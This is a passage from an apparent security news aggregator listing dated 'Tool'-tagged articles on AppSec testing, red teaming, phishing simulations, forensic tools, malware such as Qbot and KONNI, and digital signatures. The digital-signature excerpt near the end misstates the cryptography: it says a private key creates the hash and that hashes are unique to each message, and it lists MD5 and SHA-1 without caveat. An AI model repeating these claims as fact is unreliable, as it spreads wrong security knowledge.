vulnerabilities, impacts and probabilities), controls, policies, procedures, metrics, objectives etc. - maybe an XML schema with specified field names and (where applicable) enumerated lists of values. Aside from migrating between ISMS IT support systems and services, standard data formats would facilitate data sharing between application systems, services or sub-functions (e.g. for vulnerability management, incident management and information risk management), and between departments or even organisations (e.g. insurance companies, auditors and advisors and their clients and partners). Perhaps we should develop an outline specification and propose such a standard to ISO/IEC JTC1 SC 27. A New W Tool Vulnerability
Veracode 2020-09-04 11:31:55 AppSec Tools Proliferation Is Driving Investments to Consolidate (direct link) When it comes to application security (AppSec), it's important to note that no one testing type can uncover every flaw. Each tool is designed with a different area of focus, along with various speeds and costs, so it's necessary to employ a mix of testing types. A good way to think about AppSec testing types is to compare them to health exams. You wouldn't have a cholesterol test and assume your annual physical was complete. Similarly, you shouldn't conduct a static analysis scan and assume you've covered all the bases. In the chart below, you'll notice that static analysis works on any type of application (web, desktop, mobile, etc.) and covers a broad range of programming languages. However, it can't find business logic flaws or alert you to known vulnerabilities in open source components. Penetration testing might look like it can uncover every vulnerability, but it too has its downsides. Penetration tests are manual, so not only are they time consuming and expensive but the results are also quickly outdated. And, since penetration testing is conducted in staging or production, it often creates unplanned work for the development team. [Figure: Mix of AppSec scans] Most organizations know that they need to implement several testing types. In fact, a recent survey sponsored by Veracode and conducted by Enterprise Strategy Group (ESG) revealed that more than 71 percent of organizations use more than 10 different AppSec tools. But of these organizations surveyed, 84 percent answered that the number of AppSec tools they employ is posing a challenge. [Figure: Individual AppSec tools in use] Multiple testing types are necessary for a mature AppSec program, but they can be challenging to manage. Why do multiple testing types cause a challenge at many organizations? Because most AppSec vendors only offer one or two testing types. So if an organization chooses a vendor that only offers static analysis, and they want to add more testing types, they have to employ more vendors. Multiple vendors can be challenging for an organization to manage because the scan metrics will appear on separate dashboards, which makes it difficult to assess risk across the enterprise. The ESG study confirms this challenge, with over 40 percent of respondents citing AppSec metrics as an ongoing issue. 34 percent of ESG survey respondents plan to consolidate vendors to alleviate the burden of multiple testing types. Finding one vendor that offers a comprehensive set of AppSec tools, like Veracode, can alleviate the burden of vendor management. Veracode offers static analysis, dynamic analysis, software composition analysis, interactive application security testing, and penetration testing which, if used together, can enable your organization to drive down risk across the entire application lifetime from development to testing to production. Veracode Analytics provides metrics for all five offerings in one central location. Having metrics in one place allows organizations to assess the value of their scan types, pinpoint where further investments are needed, and compare the success of their program to similar organizations in the industry. Organizations can share the findings from their analytics with stakeholders or exec Tool
WiredThreatLevel.webp 2020-09-04 11:00:00 Creepy 'Geofence' Finds Anyone Who Went Near a Crime Scene (direct link) Police increasingly ask Google and other tech firms for data about who was where, when. Two judges ruled the investigative tool invalid in a Chicago case. Tool
ESET.webp 2020-09-03 15:44:08 Microsoft debuts deepfake detection tool (direct link) As the US presidential election nears, the company's new tech should also help assure people that an image or video is authentic. Tool
AlienVault.webp 2020-09-02 05:01:00 Red Team testing explained: what is Red Teaming? (direct link) This blog was written by a third-party author. In the world of cybersecurity preparedness, there are a variety of strategies organizations large and small can take to help protect their networks and data from cyber-attacks. One such strategy involves an organization testing its own environment for security vulnerabilities. But because security weaknesses come in different forms, it’s necessary to have a focused security team that comprehensively searches for vulnerabilities that go beyond simple risk assessments. Part of this dedicated security team can include a Red Team. What is a Red Team? Whether internal or external, Red Teams are responsible for running simulated cyberattacks on either their own organization (in the case of an internal Red Team) or other organizations (in the case of Red Team services as part of contracted external security services) to establish the effectiveness of the organization’s security programs. While Red Teams use many of the same tools and techniques used in penetration tests or “ethical hacking”, the objective of a Red Team is different. Attacks employed by Red Teams are multi-layered simulations designed to gauge how well a company’s people, networks, applications, and physical security controls can detect, alert and respond to a genuine attack. What is Red Team testing? Red Team testing is also known as an Adversary Simulation or simply Red Teaming. During Red Team testing, highly experienced security professionals take on the guise of a real attacker and attempt to breach the organization’s cyber defenses. The attack scenarios they enact are designed to exercise various attack surfaces presented by the organization and identify gaps in preventative, detective, and response-related security controls. These attacks leverage a full range of tools available to the most persistent attackers—including social engineering and physical attack vectors, from carefully crafted phishing emails to genuine attempts to breach onsite security and gain access to server rooms. Prior to the assessment, rules of engagement are established between the Red Team members and the smallest possible set of participants within the organization to be tested. This number will vary but is typically no more than 5 people in key positions to view the organization’s detection and response activities. Based on the rules of engagement, a Red Team may target any or all of the following areas during the exercise: Technology defenses – In order to reveal potential vulnerabilities and risks within hardware and software-based systems like networks, applications, routers, switches, and appliances. Human defenses – Often the weakest link in any organization’s cyber defenses, Red Teaming will target staff, independent contractors, departments, and business partners to ensure they’re all as secure as possible. Physical defenses – Physical security around offices, warehouses, substations, data centers, and buildings is just as important as technology defenses, and as such should be stress tested against a genuine attack. Something as seemingly innocuous as holding a secure door open for someone without having them tap in can provide the gap an attacker needs to gain access to unauthorized systems. Through this process, Red Team testing helps security teams identify any loopholes or weak points that could provide opportunities for attackers (either internal or external) to gain access to a company’s systems, which could then result in a serious data breach. Most importantly, this highlights gaps in the detective and response capabilities of the organization meant to identify and counter such malicious activities on a day-to-day basis. Who is Red Team testing suitable for? The harsh reality of today’s Tool Threat
Blog.webp 2020-09-01 19:43:43 Threat Hunting: Velociraptor for Endpoint Monitoring (direct link) Velociraptor is a tool for collecting host-based state information using Velocidex Query Language (VQL) queries. To learn more about Velociraptor, read the documentation at https://www.velocidex.com/docs Table of Contents: Introduction to Velociraptor; Architecture; What is VQL; Prerequisites; Velociraptor Environment; Velociraptor installation; Addition of host forensics investigation / Threat Hunting. Introduction to Velociraptor Velociraptor is a free... Tool Threat
TechRepublic.webp 2020-09-01 10:00:23 Microsoft Teams: This ambitious low-code tool will change how you use data and share applications (direct link) Microsoft's Project Oakdale plan for data applications inside Teams is starting to shape up. Tool
SecurityAffairs.webp 2020-08-30 11:29:55 Security Affairs newsletter Round 279 (direct link) A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A Google Drive weakness could allow attackers to serve malware Adobe released open-source tool Stringlifier to identify randomly generated strings Canadian delivery company Canpar Express suffered a ransomware attack […] Ransomware Malware Tool
itsecurityguru.webp 2020-08-28 15:14:38 How to choose a SAST tool to secure your development? (direct link) When it comes to secure development, how do you integrate a code scanner into the process, and what are the traps and pitfalls? All developers face static analysis (static application security testing or SAST, which means code analysis without execution). However, we still rarely see full-fledged SAST solutions in use capable of detecting advanced vulnerabilities. Well-known […] Tool
WiredThreatLevel.webp 2020-08-28 12:00:00 What Virtual Reality for Flies Teaches Us About Human Vision (direct link) Optical illusions can be a useful tool for studying how we see stuff, but it's hard to uncover just how they work. Unless, that is, you show them to flies. Tool
DarkReading.webp 2020-08-27 15:55:00 Old Malware Tool Acquires New Tricks (direct link) Latest version of Qbot has acquired a new feature for collecting email threads from Outlook clients. Malware Tool ★★
SecurityAffairs.webp 2020-08-23 06:56:08 Adobe released open-source tool Stringlifier to identify randomly generated strings (direct link) Adobe has released an open-source tool, dubbed Stringlifier, that allows users to identify randomly generated strings in any plain text; it can be used to sanitize logs. Adobe has released an open-source tool, dubbed Stringlifier, which was designed to identify randomly generated strings in any plain text. The Stringlifier tool was written in Python and […] Tool
AlienVault.webp 2020-08-19 11:00:00 How to check the effectiveness of phishing (direct link) This blog was written by an independent guest blogger. You can install the latest generation of security software to protect against evil hackers, but what is the use of it if your employees continue to follow phishing links? Several security companies conduct social and technical research of real-life phishing attacks aimed at different businesses and are impressed with the scale of the problem. The purpose of such studies is not only to understand how hackers deceive the staff and which hooks they use, but also to draw the right conclusions about what type of security awareness training to use and how often it is needed. One of the security companies I work with sent more than 15 thousand “phishing” emails to corporate mailboxes in 2019. Let’s see their results. What is inside the phishing email? According to statistics, last year phishing became the most popular tool for penetrating companies’ infrastructure. Attackers used this method in 70% of attacks. RDP hacking took second place. In general, all phishing emails try to provoke a user into one of two actions: clicking on a phishing link or opening a malicious attachment. During pentest projects, depending on the final task, researchers send employees several letters with a link to a web form for entering account credentials or Microsoft Office documents with malicious macros. Most messages use harmless files that allow researchers to track only the fact of following the links or opening attachments. But sometimes, researchers send documents that contain macros that allow them to get remote access to workstations. Using such messages, researchers can check not only the vigilance of employees but also the reliability of the means of protection. The main task of each such project is to make the “phishing” email look as realistic as possible. Researchers try to craft letters and build the overall logic of the attack the way a real cybercriminal would, assuming, for example, that the goal of the attacker is to gain access to the correspondence of the company’s top management personnel. Usually, attackers start with harvesting information about the company using open sources. In one of the cases, our “attackers” discovered Outlook Web App, as well as news about the presence of a 0-day vulnerability in a browser used by this company. An attacker, preparing for an attack, considers all possible ways to achieve the desired goal and selects the most suitable and effective way. What was found? From our experience, users are more likely to open file attachments than to provide their data via a web form. In each of the companies that were tested, several employees opened attachments without any delay. Among email topics used, corporate bonus programs (employee discounts, corporate offers from partner companies) turned out to be the most effective. About 33% of addressees reacted to such letters. Letters that asked employees to read the new corporate rules or other important corporate documents took second place. Especially successful are attacks that have to do with current events. For example, in December it is highly effective to invite the victims to check the work schedule for the upcoming holidays or find out about discounts on holiday events. This spring, the hottest topic, of course, was COVID-19. 15% of the Malware Tool Studies
Logo_logpoint.webp 2020-08-18 20:00:52 9th September – Faster Detection and Response with MITRE ATT&CK (direct link) The MITRE ATT&CK framework is a tool to help security teams create a more effective security defense. ATT&CK uses open standards and is essentially a database of documented threat behaviors. Using the ATT&CK framework, analysts can track threat actor behavior to speed up incident response and investigation. When combined with a SIEM or UEBA solution, [...] Tool Threat ★★
SecureMac.webp 2020-08-18 19:44:03 XCSSET: New Mac malware infects Xcode projects (direct link) Security researchers have discovered an interesting new variety of macOS malware that spreads by attacking Xcode projects. It's called XCSSET, and in this article, we'll tell you what you need to know about this unusual threat in order to stay safe. What is XCSSET? XCSSET is a suite of malicious components that spreads through infected Xcode projects. Xcode is a tool used by app developers to write software for Apple platforms. An Xcode ... Malware Tool Threat
Pirate.webp 2020-08-17 08:03:23 Arcane – Tool To Backdoor iOS Packages (iPhone ARM) (direct link) Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories. It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device. How Arcane Tool To Backdoor iOS Package Works It's possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Tool
WiredThreatLevel.webp 2020-08-15 13:00:00 The NSA and FBI Expose Fancy Bear's Sneaky Hacking Tool (direct link) Plus: TikTok tracking, Russian SIMs, and more of this week's top security news. Tool APT 28
DarkReading.webp 2020-08-14 16:25:00 DHS CISA Warns of Phishing Emails Rigged with KONNI Malware (direct link) Konni is a remote administration tool cyberattackers use to steal files, capture keystrokes, take screenshots, and execute malicious code. Malware Tool
Blog.webp 2020-08-13 21:47:11 Forensic Investigation: Autopsy Forensic Browser in Linux (direct link) Introduction Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It is an open-source tool for digital forensics which was developed by Basis Technology. This tool is free to use and is very efficient in the investigation of hard drives. It also consists of features like multi-user... Tool
AlienVault.webp 2020-08-13 11:00:00 AlienApps and plug-ins combined into one framework (direct link) The heart of any detection and response solution is the ability to collect events from the environment, perform corrective response actions, and integrate with customer workflows. Today, we’re proud to announce the launch of a complete redesign of the user interface for these third-party integrations. We’ve updated our design to make it easier for customers to find the integrations they need, centralize the configuration of them, and identify any operational problems with the integrations. What exactly have we done? Previously, we’ve had two types of integrations with other security and IT products - plug-ins and AlienApps. Plug-ins were basic data collection tools used to collect, normalize, and enhance event logs from your environment. AlienApps performed a variety of functions including collection of event data via API polling, requesting third-party response actions such as blocking dangerous internet destinations, and sending notifications to ticketing systems such as Jira or ServiceNow®. Now, we’ve streamlined the entire process by combining plug-ins and AlienApps into one framework. We have also simplified finding the right tool by combining redundant or overlapping ones. For example, some products previously had different plug-ins for handling different log formats. We’ve collapsed all these into one for the sake of simplicity, without any functional changes in event handling. From a practical perspective, all AlienApps provide one or more of the following capabilities: Data Collection - capable of collecting events from your environment, including processing syslog messages, retrieving from log aggregation services (such as CloudWatch Logs, or an S3 bucket) and polling APIs. Response - will help your security team “do things” - or, as we say, orchestrate the response - by taking action to investigate or respond to threats. Examples include things like querying an agent for additional host telemetry, adding an IP or domain to a block list, or disabling a cloud service account. Notification - help the SOC team be more productive by sending data to third-party services and applications such as Jira, ServiceNow, or Box Notes. The most common use case here is opening a case in your existing workflow. Head over to “Data Sources>Alien Apps” for a look at the new GUI. The apps currently in use will be shown on this page, along with some useful graphs about application use. If any of the apps have configuration errors, you’ll see a red bar along with information about what needs to be fixed. See figure 1. To add new integrations to a USM deployment, click “available apps” and search for the vendor. This will reveal all the apps available for that vendor. Note that there can be more than one app per vendor - there is one for every product or product line, depending on how that vendor organizes their products. See figure 2 for an example. Using Response and Notification Actions Nothing has changed about how AlienApp response actions work. If you haven’t tried them before, manual response actions can be taken in the event or alarm view by clicking on an individual event or alarm, then clicking “Select Action”. This will bring up a series of dialogs asking you to select the AlienApp you’d like to use, along with other relevant information such as the IP address or host, and any fields needed such as the case name if you are opening a ticket. Once everything is configured, simply click “run” and the response action will be initiated Tool Threat
WiredThreatLevel.webp 2020-08-09 13:00:00 A British AI Tool to Predict Violent Crime Is Too Flawed to Use (direct link) A government-funded system known as Most Serious Violence was built to predict first offenses but turned out to be wildly inaccurate. Tool
ZDNet.webp 2020-08-08 07:00:08 DEF CON: New tool brings back 'domain fronting' as 'domain hiding' (direct link) After Amazon and Google stopped supporting the censorship-evading domain fronting technique on their clouds in 2018, the new Noctilucent toolkit aims to bring it back in a new form as "domain hiding." Tool
TechRepublic.webp 2020-08-06 15:32:17 IBM creates an open source tool to simplify API documentation (direct link) OpenAPI Comment Parser for developers aims to make good API documentation easy to write and read. Tool
DarkReading.webp 2020-08-03 16:45:00 DHS Urges 'Highest Priority' Attention on Old Chinese Malware Threat (direct link) "Taidoor" is a remote access tool that has been used in numerous cyber espionage campaigns since at least 2008. Malware Tool Threat
securityintelligence.webp 2020-08-03 16:00:27 How Employing Encryption for Data Security Changed History (direct link) Human history is full of examples of encryption playing pivotal roles in war, competition and transitions of power. Throughout recorded time, people have employed encryption as a tactical tool to keep information private. That data could involve military campaigns, plots to overthrow political leaders or political dealings. In some cases, the use of encryption actually resulted […] Tool Guideline
TechRepublic.webp 2020-08-03 15:00:08 BlackBerry launches free tool for reverse engineering to fight cybersecurity attacks (direct link) One of the first announcements at BlackHat USA 2020 is an open-source tool to fight malware that BlackBerry first used internally and is now making available to everyone. Malware Tool
ZDNet.webp 2020-08-03 15:00:06 BlackBerry releases new security tool for reverse-engineering PE files (direct link) BlackBerry open-sources PE Tree, a new malware reverse-engineering tool for analyzing Portable Executable (PE) files. Malware Tool
AlienVault.webp 2020-08-03 11:00:00 (Déjà vu) Digital signatures security explained (direct link) This blog was written by an independent guest blogger. Digital signatures have been around for decades, but recent events have put them back in the spotlight. They were heralded as the future of cybersecurity as far back as 1999, but in the intervening years came to be somewhat taken for granted by security engineers. Not any longer: the massive move to home working precipitated by the Covid-19 pandemic has forced many to take a fresh look at the security value of digital signatures, why they matter, and their relationship to encryption. We thought we'd do the same. In this article, we'll give you a refresher course on how digital signatures work, why they are important for security, and what the future holds. How do digital signatures work? Digital signatures, at the most fundamental level, are mathematical algorithms used to validate the authenticity and integrity of an electronic message. This "message" could be an email, a credit card transaction, or a digital document. Digital signatures create a virtual "fingerprint" that is completely unique to a person (or other entity), and can therefore be used not just to protect the contents of messages, but also to ensure that they were written by whom they claim to have been. At a deeper level, digital signatures work by applying a hash function to a message. In most cases, a user's private key will be used to create a "hash," which is a fixed-length string of numbers and letters. The way in which hash functions work means that this string is totally unique to the message being hashed. In addition, hash functions are also one-way functions — a computed hash cannot be reversed to find other files that may generate the same hash value. The most popular hashing algorithms in use today are Secure Hash Algorithm-1 (SHA-1), the Secure Hashing Algorithm-2 family (SHA-2 and SHA-256), and Message Digest 5 (MD5). The importance of digital signatures The value of digital signatures has long been recognized, but recent events have meant that they are being deployed at an unprecedented rate. This is because digital signatures afford the ability for users to securely communicate when working remotely – which more than half of US workers did even before the pandemic – without the need for a permanent, sustained encrypted connection. More specifically, digital signatures allow three factors about a message to be verified: Authentication. Because, in most implementations, digital signatures are created using the sender's private encryption key, it is possible to verify the identity of the message source. Data Integrity. Because hash functions produce a digital signature by looking at the entirety of a particular message, if any part of the message changes, so does the hash value. This means that if a message is intercepted in transit and changed, the digital certificate verification performed by the recipient fails. The recipient therefore has an easy way to check whether data security has been breached. Tool
Last update at: 2024-07-17 12:08:02